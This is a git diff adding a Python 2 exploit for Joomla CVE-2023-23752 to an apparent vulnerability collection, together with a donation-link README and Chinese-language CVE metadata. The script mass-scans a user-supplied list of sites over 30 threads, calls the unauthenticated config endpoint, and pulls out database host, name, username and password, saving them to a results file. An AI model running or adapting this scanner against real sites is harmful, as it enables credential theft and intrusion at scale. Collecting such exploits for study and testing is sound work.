diff --git a/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py b/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py new file mode 100644 index 0000000000000000000000000000000000000000..59ef149d948acf01b6641a6914527a2a05e95861 --- /dev/null +++ b/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py @@ -0,0 +1,41 @@ +#An issue was discovered in Joomla! 4.0.0 through +#4.2.7. An improper access check allows +#unauthorized access to webservice endpoints. +import requests,time,re,random,os,sys,json +from multiprocessing.dummy import Pool as ThreadPool +from colorama import Fore,Style, init +init(autoreset=True) + +r = Fore.RED + Style.BRIGHT +g = Fore.GREEN + Style.BRIGHT +c = Fore.CYAN + Style.BRIGHT +y = Fore.YELLOW + Style.BRIGHT +o = Fore.RESET + Style.RESET_ALL + + +def jomprv(url): + try: + headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/101.0.4951.61 Mobile Safari/537.36'} + asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10) + if 'dbtype' in asw.content: + hoset = re.findall('"host":"(.*?)"',asw.content)[0] + debst = re.findall('"db":"(.*?)"',asw.content)[0] + uset = re.findall('"user":"(.*?)"',asw.content)[0] + paset = re.findall('"password":"(.*?)"',asw.content)[0] + print ("Domaij" + " : " + url) + print (g + "HOST" + " : " + hoset) + print (g + "DB" + " : " + debst) + print (g + "User" + " : " + uset) + print (g + "Pass" + " : " + paset) + open('res.txt', 'a').write('\n!== Results Joomla CVE-2023-23752 ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n') + else: + print(r+ 'BAD' + ' ' + url) + #for res in regex: + except: + pass +print "{}JOOMLA! CVE-2023-23752 | Shin Code\n".format(y) +url = open(raw_input(o+'List:~# '),'r').read().splitlines() +pool = ThreadPool(int(30)) +pool.map(jomprv, url) +pool.close() +pool.join() \ No newline at end of file diff --git a/cve/joomla/2023/CVE-2023-23752/README.md b/cve/joomla/2023/CVE-2023-23752/README.md new file mode 100644 index 0000000000000000000000000000000000000000..f6c41690c6323c1518fb7a0f842360ab383ba8d6 --- /dev/null +++ b/cve/joomla/2023/CVE-2023-23752/README.md @@ -0,0 +1,14 @@ +# Joomla-CVE-2023-23752 +python 2.7 + +Buy Coffee : + +Bitcoin $: 31mtLHqhaXXyCMnT2EU73U8fwYwigiEEU1 + +Perfect Money $: U22270614 + +Saweria $: https://saweria.co/Shin403 + +Trakteer $: https://trakteer.id/shin403 + +![Screenshot_2023-03-11-18-20-57-172-edit_com termux](https://user-images.githubusercontent.com/59664965/224481416-8fd859c7-ecb3-40e9-9730-2187b2ca388a.jpg) diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml new file mode 100644 index 0000000000000000000000000000000000000000..40166d53c33fda981f00d1bf7dbe83950f4061d0 --- /dev/null +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -0,0 +1,21 @@ +id: CVE-2023-23752 +source: + https://github.com/Jenderal92/Joomla-CVE-2023-23752 +info: + name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 + severity: medium + description: + 在Joomla!4.0.0至4.2.7中发现一个问题。一个不恰当的访问检查允许未经授权访问网络服务端点。 + scope-of-influence: + Joomla! 4.0.0 through 4.2.7 + reference: + - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 + cwe-id: None + cnvd-id: None + kve-id: None + tags: + - 非法访问 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 525f67acfbf87bfc74cb7820812296b92e40c764..83d154a9718d584fa955f2e8ff270e3391021f81 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -115,6 +115,8 @@ cve: - CVE-2021-3449 - CVE-2022-0778 - CVE-2022-3786 + joomla: + - CVE-2023-23752 libxml2: - CVE-2020-24977 - CVE-2021-3517